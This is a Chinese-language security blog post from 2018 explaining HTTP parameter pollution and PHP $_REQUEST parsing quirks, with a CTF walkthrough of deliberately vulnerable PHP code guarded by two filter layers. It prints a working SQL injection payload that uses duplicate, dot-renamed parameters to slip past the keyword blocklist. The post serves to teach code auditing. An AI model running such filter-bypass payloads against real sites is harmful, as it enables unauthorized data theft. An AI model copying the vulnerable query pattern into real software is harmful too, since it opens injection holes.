<!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">



<title>浅析HTTP参数污染（HPP）以及REQUEST引发的安全问题 | Love to share</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    


</head>
<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">zhhhy&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>

        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">zhhhy&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div id="post-toc" class="post-toc">
            <span class="post-toc-title">catalogue</span>
            <div class="post-toc-content">
                <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#成因"><span class="toc-text">成因</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#利用HPP绕过waf"><span class="toc-text">利用HPP绕过waf</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#这边先列出三种php特性"><span class="toc-text">这边先列出三种php特性</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#一道CTF题试试手"><span class="toc-text">一道CTF题试试手</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#再看看REQUEST的另一个特性"><span class="toc-text">再看看REQUEST的另一个特性</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#小测试"><span class="toc-text">小测试</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#实例漏洞"><span class="toc-text">实例漏洞</span></a></li></ol>
            </div>
        </div>
    
    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">浅析HTTP参数污染（HPP）以及REQUEST引发的安全问题</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">zhhhy</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">November 15, 2018&nbsp;&nbsp;16:39:51</a>
                        </span>
                    
                    
                </div>
            
        </header>

        <section class="post-content">
            <h2 id="成因"><a href="#成因" class="headerlink" title="成因"></a>成因</h2><p>个人理解<code>HTTP参数污染</code>本身并不是一个漏洞，而是由于程序员没用充分理解<code>服务端</code>接受参数的机制特性，导致对传进来的参数无法进行正确的处理。</p>
<a id="more"></a>

<blockquote>
<p>下面这个表简单列举了一些常见的Web服务器对同样名称的参数出现多次的处理方式：</p>
<table>
<thead>
<tr>
<th>Web服务器</th>
<th>参数获取函数</th>
<th>获取到的参数</th>
</tr>
</thead>
<tbody><tr>
<td>PHP/Apache</td>
<td>$_GET(“par”)</td>
<td>last</td>
</tr>
<tr>
<td>JSP/Tomcat</td>
<td>Request.getParameter(“par”)</td>
<td>First</td>
</tr>
<tr>
<td>Perl(CGI)/Apache</td>
<td>Param(“par”)</td>
<td>First</td>
</tr>
<tr>
<td>Python/Apache</td>
<td>getvalue(“par”)</td>
<td>All (List)</td>
</tr>
<tr>
<td>ASP/IIS</td>
<td>Request.QueryString(“par”)</td>
<td>All (comma-delimited string)</td>
</tr>
</tbody></table>
</blockquote>
<p>当服务端接收到传入的变量名相同的时候，根据自身的机制来接受传参，如下测试代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a =$_GET[<span class="string">'id'</span>];</span><br><span class="line"><span class="keyword">echo</span> $a;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="/.com//hpp-1%5C1.png" alt></p>
<p>效果很明显，那么利用这个特性，当服务端存在不合理的处理机制的时候，漏洞就产生了。</p>
<h2 id="利用HPP绕过waf"><a href="#利用HPP绕过waf" class="headerlink" title="利用HPP绕过waf"></a>利用HPP绕过waf</h2><h3 id="这边先列出三种php特性"><a href="#这边先列出三种php特性" class="headerlink" title="这边先列出三种php特性"></a>这边先列出三种<code>php特性</code></h3><blockquote>
<p>1.php自身在解析请求的时候，如果参数名字中包含<strong>空格、 .  、[</strong>这几个字符，会将他们转换成<code>_</code>。</p>
<p>2.php在遇到相同参数时接受第二个参数</p>
<p>3.通过<code>$_SERVER[&#39;REQUEST_URI&#39;]</code>方式获得的参数并不会转换。</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a =$_GET[<span class="string">'i_d'</span>];</span><br><span class="line">$request_uri= explode(<span class="string">"?"</span>,$_SERVER[<span class="string">'REQUEST_URI'</span>]);</span><br><span class="line">var_dump($a);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">var_dump($request_uri[<span class="number">1</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="/.com//hpp-1%5C2.png" alt></p>
<h3 id="一道CTF题试试手"><a href="#一道CTF题试试手" class="headerlink" title="一道CTF题试试手"></a>一道CTF题试试手</h3><p>漏洞代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//index.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">require</span> <span class="string">'db.inc.php'</span>;</span><br><span class="line">  <span class="function"><span class="keyword">function</span> <span class="title">dhtmlspecialchars</span><span class="params">($string)</span> </span>&#123;</span><br><span class="line">      <span class="keyword">if</span> (is_array($string)) &#123;</span><br><span class="line">          <span class="keyword">foreach</span> ($string <span class="keyword">as</span> $key =&gt; $val) &#123;</span><br><span class="line">              $string[$key] = dhtmlspecialchars($val);</span><br><span class="line">          &#125;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span> &#123;</span><br><span class="line">          $string = str_replace(<span class="keyword">array</span>(<span class="string">'&amp;'</span>, <span class="string">'"'</span>, <span class="string">'&lt;'</span>, <span class="string">'&gt;'</span>, <span class="string">'('</span>, <span class="string">')'</span>), <span class="keyword">array</span>(<span class="string">'&amp;amp;'</span>, <span class="string">'&amp;quot;'</span>, <span class="string">'&amp;lt;'</span>, <span class="string">'&amp;gt;'</span>, <span class="string">'（'</span>, <span class="string">'）'</span>), $string);</span><br><span class="line">          <span class="keyword">if</span> (strpos($string, <span class="string">'&amp;amp;#'</span>) !== <span class="keyword">false</span>) &#123;</span><br><span class="line">              $string = preg_replace(<span class="string">'/&amp;amp;((#(\d&#123;3,5&#125;|x[a-fA-F0-9]&#123;4&#125;));)/'</span>, <span class="string">'&amp;\\1'</span>, $string);</span><br><span class="line">          &#125;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">return</span> $string;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="function"><span class="keyword">function</span> <span class="title">dowith_sql</span><span class="params">($str)</span> </span>&#123;</span><br><span class="line">      $check = preg_match(<span class="string">'/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile/is'</span>, $str);</span><br><span class="line">      <span class="keyword">if</span> ($check) &#123;</span><br><span class="line">          <span class="keyword">echo</span> <span class="string">"非法字符!"</span>;</span><br><span class="line">          <span class="keyword">exit</span>();</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">return</span> $str;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// 经过第一个waf处理</span></span><br><span class="line">  <span class="keyword">foreach</span> ($_REQUEST <span class="keyword">as</span> $key =&gt; $value) &#123;</span><br><span class="line">      $_REQUEST[$key] = dowith_sql($value);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// 经过第二个WAF处理</span></span><br><span class="line">  $request_uri = explode(<span class="string">"?"</span>, $_SERVER[<span class="string">'REQUEST_URI'</span>]);</span><br><span class="line">  <span class="keyword">if</span> (<span class="keyword">isset</span>($request_uri[<span class="number">1</span>])) &#123;</span><br><span class="line">      $rewrite_url = explode(<span class="string">"&amp;"</span>, $request_uri[<span class="number">1</span>]);</span><br><span class="line">      <span class="keyword">foreach</span> ($rewrite_url <span class="keyword">as</span> $key =&gt; $value) &#123;</span><br><span class="line">          $_value = explode(<span class="string">"="</span>, $value);</span><br><span class="line">          <span class="keyword">if</span> (<span class="keyword">isset</span>($_value[<span class="number">1</span>])) &#123;</span><br><span class="line">              $_REQUEST[$_value[<span class="number">0</span>]] = dhtmlspecialchars(addslashes($_value[<span class="number">1</span>]));</span><br><span class="line">          &#125;</span><br><span class="line">      &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// 业务处理</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="keyword">isset</span>($_REQUEST[<span class="string">'submit'</span>])) &#123;</span><br><span class="line">      $user_id = $_REQUEST[<span class="string">'i_d'</span>];</span><br><span class="line">      $sql = <span class="string">"select * from ctf.users where id=$user_id"</span>;</span><br><span class="line">      $result=mysql_query($sql);</span><br><span class="line">      <span class="keyword">while</span>($row = mysql_fetch_array($result))</span><br><span class="line">      &#123;</span><br><span class="line">          <span class="keyword">echo</span> <span class="string">"&lt;tr&gt;"</span>;</span><br><span class="line">          <span class="keyword">echo</span> <span class="string">"&lt;td&gt;"</span> . $row[<span class="string">'name'</span>] . <span class="string">"&lt;/td&gt;"</span>;</span><br><span class="line">          <span class="keyword">echo</span> <span class="string">"&lt;/tr&gt;"</span>;</span><br><span class="line">      &#125;</span><br><span class="line">  &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>很明显这是考察注入，不难发一下<code>$user_id</code>虽让可控，但是都进过上面的层层<code>waf</code>，特殊字符被转义，关键字也被过滤，似乎没有突破口了。</p>
<p>那么回想开头的<code>PHP特性</code>，我们可以用<code>user.id</code>来顶替<code>user_id</code>，而这两个变量利用<code>$_SERVER[&#39;REQUEST_URI&#39;]</code>处理时，是两个不同的变量，前面的实验就可以看出。先看看一下部分代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$request_uri = explode(<span class="string">"?"</span>, $_SERVER[<span class="string">'REQUEST_URI'</span>]);</span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">isset</span>($request_uri[<span class="number">1</span>])) &#123;</span><br><span class="line">     $rewrite_url = explode(<span class="string">"&amp;"</span>, $request_uri[<span class="number">1</span>]);</span><br><span class="line">     <span class="keyword">foreach</span> ($rewrite_url <span class="keyword">as</span> $key =&gt; $value) &#123;</span><br><span class="line">         $_value = explode(<span class="string">"="</span>, $value);</span><br><span class="line">         <span class="keyword">if</span> (<span class="keyword">isset</span>($_value[<span class="number">1</span>])) &#123;</span><br><span class="line">             $_REQUEST[$_value[<span class="number">0</span>]] = dhtmlspecialchars(addslashes($_value[<span class="number">1</span>]));</span><br><span class="line">         &#125;</span><br><span class="line">     &#125;</span><br></pre></td></tr></table></figure>

<p>首先用<code>?</code>分割，然后再对参数部分用<code>&amp;</code>分割，如下图效果，就是将变量每个都取出来。然后在对变量的值进行过滤操作。</p>
<p><img src="/.com//hpp-1%5C3.png" alt></p>
<p>假如我们传入<code>user_id=select database()&amp;user.id=123</code>，当经过第一层<code>waf</code>的时候,由于<code>user.id</code>被解析成<code>user_id</code>导致前面的值被覆盖，于是不会被第一个<code>waf</code>给拦截。而在进行第二个<code>waf</code>处理时，采用<code>REQUEST_URI</code>处理参数，对参数进行替换等操作，再得到新的<code>_REQUEST</code>。这样就导致我们的<code>payload</code>成功的带入了<code>sql</code>语句。不过还得先绕过<code>dhtmlspecialchars</code>这个函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">dhtmlspecialchars</span><span class="params">($string)</span> </span>&#123;</span><br><span class="line">      <span class="keyword">if</span> (is_array($string)) &#123;</span><br><span class="line">          <span class="keyword">foreach</span> ($string <span class="keyword">as</span> $key =&gt; $val) &#123;</span><br><span class="line">              $string[$key] = dhtmlspecialchars($val);</span><br><span class="line">          &#125;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span> &#123;</span><br><span class="line">          $string = str_replace(<span class="keyword">array</span>(<span class="string">'&amp;'</span>, <span class="string">'"'</span>, <span class="string">'&lt;'</span>, <span class="string">'&gt;'</span>, <span class="string">'('</span>, <span class="string">')'</span>), <span class="keyword">array</span>(<span class="string">'&amp;amp;'</span>, <span class="string">'&amp;quot;'</span>, <span class="string">'&amp;lt;'</span>, <span class="string">'&amp;gt;'</span>, <span class="string">'（'</span>, <span class="string">'）'</span>), $string);</span><br><span class="line">          <span class="keyword">if</span> (strpos($string, <span class="string">'&amp;amp;#'</span>) !== <span class="keyword">false</span>) &#123;</span><br><span class="line">              $string = preg_replace(<span class="string">'/&amp;amp;((#(\d&#123;3,5&#125;|x[a-fA-F0-9]&#123;4&#125;));)/'</span>, <span class="string">'&amp;\\1'</span>, $string);</span><br><span class="line">          &#125;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">return</span> $string;</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>仔细看看，哪些被特殊编码替换了。 我们试一下构造<code>payload</code>,其实构造的<code>payload</code>很少需要被过滤掉的那些特殊字符，只不过<strong>括号</strong>被过滤了，导致注出数据库名有点棘手。。我并没想好如何绕过过滤括号的注入，以下下都是已知数据库名和表名的前提。    </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">order by <span class="number">4</span> <span class="comment">//先测出来了一共四列</span></span><br><span class="line">union select <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span> %<span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><img src="/.com//hpp-1%5C4.png" alt></p>
<p>发现成功绕过了<code>waf</code>,再源码里加几句输出看看<code>语句发生了什么变化</code>的</p>
<p><img src="/.com//hpp-1%5C5.png" alt></p>
<p>在经过第二个<code>waf</code>后<code>i_d</code>的值成了我们构造的<code>payload</code>的，这也说明了，<strong>第一个waf</strong>只对了最后那个接受进来的参数进行过滤。也就是<code>i.d=111</code>，这个当然不会被<code>waf</code>给阻挡了。 于是就这样华丽丽的利用<code>phh</code>成功绕过了<code>waf</code>。构造一下读取<code>flag</code>的语句</p>
<p><img src="/.com//hpp-1%5C6.png" alt></p>
<p>由于是用<code>REQUEST_URI</code>获取，所以需要对将这些会被编码的字符给替换掉，所以最终的payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?i_d=<span class="number">-11</span><span class="comment">/**/</span>union<span class="comment">/**/</span>select<span class="comment">/**/</span><span class="number">1</span>,flag,<span class="number">3</span>,<span class="number">4</span><span class="comment">/**/</span>from<span class="comment">/**/</span>day10.users&amp;i.d=<span class="number">111</span></span><br></pre></td></tr></table></figure>

<p><img src="/.com//hpp-1%5C7.png" alt></p>
<h2 id="再看看REQUEST的另一个特性"><a href="#再看看REQUEST的另一个特性" class="headerlink" title="再看看REQUEST的另一个特性"></a>再看看<strong>REQUEST</strong>的另一个特性</h2><p><code>$_REQUEST</code>是直接从GET，POST 和 COOKIE中取值，不是他们的引用。即使后续<code>GET，POST 和 COOKIE</code>发生了变化，也不会影响<code>$_REQUEST</code>的结果</p>
<h3 id="小测试"><a href="#小测试" class="headerlink" title="小测试"></a>小测试</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_REQUEST[<span class="string">'id'</span>]))&#123;</span><br><span class="line">	$id_1=str_replace(<span class="string">"flag"</span>,<span class="string">""</span>,$_REQUEST[<span class="string">'id'</span>]);</span><br><span class="line">&#125;</span><br><span class="line">$id_2 = $_GET[<span class="string">'id'</span>];</span><br><span class="line"><span class="keyword">echo</span> $id_1,<span class="string">"&lt;br&gt;"</span>;</span><br><span class="line"><span class="keyword">echo</span> $id_2,<span class="string">"&lt;br&gt;"</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>一个简单的小片段，运行结果如下</p>
<p><img src="/.com//hpp-1%5C8.png" alt></p>
<p><code>REQUEST</code>的传入方式有三种<code>GET</code>,<code>POST</code>，<code>COOKIE</code>三种。由于我们采用<code>GET</code>方式输入，所以也会进入<code>if</code>里做了替换为空的操作。可当我们输出<code>$_GET[&#39;id&#39;]</code>的值是发现它并没有进入过滤。那么如果正常的业务流程中，由于传参方法的不一致，就很可能导致<code>waf</code>被绕过。</p>
<h2 id="实例漏洞"><a href="#实例漏洞" class="headerlink" title="实例漏洞"></a>实例漏洞</h2><p>是Ph神16年写的文章，在此，再膜一次Ph神！！tql！由于没给出具体版本号和CMS下载的地址,无法复现，这边就贴上个链接，学习一下思路。</p>
<p><a href="https://bugs.leavesongs.com/php/%E8%B4%B7%E9%BD%90%E4%B9%90%E7%B3%BB%E7%BB%9F%E6%9C%80%E6%96%B0%E7%89%88sql%E6%B3%A8%E5%85%A5%EF%BC%88%E6%97%A0%E9%9C%80%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87waf%E5%8F%AFunion-select%E8%B7%A8%E8%A1%A8%E6%9F%A5%E8%AF%A2%EF%BC%89/" target="_blank" rel="noopener">贷齐乐系统最新版SQL注入，无需登录绕过WAF可union select跨表查询，用官方给的例子『宁波贷』作为验证。</a></p>

        </section>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>zhhhy</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="http://yoursite.com/2018/11/15/hpp-1/">http://yoursite.com/2018/11/15/hpp-1/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Solgan:</span>
                         <span>Do you believe in <strong>DESTINY<strong>?</strong></strong></span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/代码审计/"># 代码审计</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2018/11/20/变量覆盖/">简单总结变量覆盖</a>
            
            
            <a class="next" rel="next" href="/2018/11/14/Serialize/">Serialize</a>
            
        </section>


    </article>
</div>
        </div>
        <footer id="footer" class="footer">
    <div class="copyright">
        <span>© zhhhy | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Sirice19/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>
    </div>
</body>
</html>